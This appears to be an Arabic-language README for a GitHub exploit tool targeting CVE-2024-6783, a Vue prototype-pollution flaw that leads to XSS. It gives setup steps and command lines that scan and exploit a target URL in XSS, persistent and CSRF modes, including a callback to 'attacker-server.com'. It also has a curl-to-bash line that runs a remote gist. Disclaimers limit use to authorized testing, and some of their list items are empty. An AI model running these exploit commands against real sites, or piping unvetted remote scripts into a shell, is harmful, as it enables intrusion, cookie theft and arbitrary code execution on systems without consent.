
CVE-2024-6783 - Vue CVE
تم اكتشاف ثغرة أمنية في Vue تسمح لمهاجم بتنفيذ XSS عبر تلويث النموذج الأولي (prototype pollution). يمكن للمهاجم تغيير سلسلة النموذج الأولي لبعض الخصائص مثل Object.prototype.staticClass أو Object.prototype.staticStyle لتنفيذ كود جافا سكريبت عشوائي.
ادعم صيانة هذا المشروع عبر PayPal أو عن طريق مسح رمز QR أدناه.
استخدم هذا المشروع فقط في بيئات آمنة ومرخصة مثل:
إعداد مثال:
git clone https://github.com/HORKimhab/CVE-2024-6783
cd CVE-2024-6783
# يستخدم المشروع بايثون كما يلي
# إنشاء بيئة افتراضية
python -m venv venv
# تفعيل البيئة الافتراضية
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# تثبيت المتطلبات
pip install -r requirements.txt
مثال على الاستخدام:
# مسح فقط
python cve-2024-6783.py -u https://example.com -v
# مسح واستغلال XSS
python cve-2024-6783.py -u https://example.com -e xss
# استغلال XSS مع رد اتصال
python cve-2024-6783.py -u https://example.com -e xss -c http://attacker-server.com/callback
# خادم رد اتصال تلقائي
python cve-2024-6783.py -u https://example.com -e persistent -c auto
# استغلال CSRF
python cve-2024-6783.py -u https://example.com -e csrf
# مسح واستغلال كامل مع إخراج مفصل
python cve-2024-6783.py -u https://example.com -e xss -c auto -v -o evidence.html
ملاحظة:
curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y لإزالة دليل .git المتداخلمستودع لتعلم واختبار وبحث مفاهيم الأمن السيبراني في بيئات خاضعة للرقابة.
هذا المستودع مخصص للأغراض التعليمية وأبحاث الأمن المصرح بها فقط.
صُمم لمساعدة المستخدمين على التعرف على:
استخدم هذا المستودع فقط في بيئات لديك إذن بها، مثل:
الاستخدام غير المصرح به أو غير القانوني محظور تمامًا.
المؤلف والمساهمون غير مسؤولين عن أي ضرر أو سوء استخدام أو مشاكل قانونية أو خسائر ناتجة عن هذا المشروع.
باستخدامك لهذا المستودع، فإنك توافق على أن:
هذا المشروع مخصص من أجل:
يرجى اتباع ممارسات الإفصاح المسؤول والامتثال لجميع القوانين المعمول بها.
للاستفسار عن الإفصاح المسؤول أو التعاون، اتصل بحارس المستودع عبر GitHub.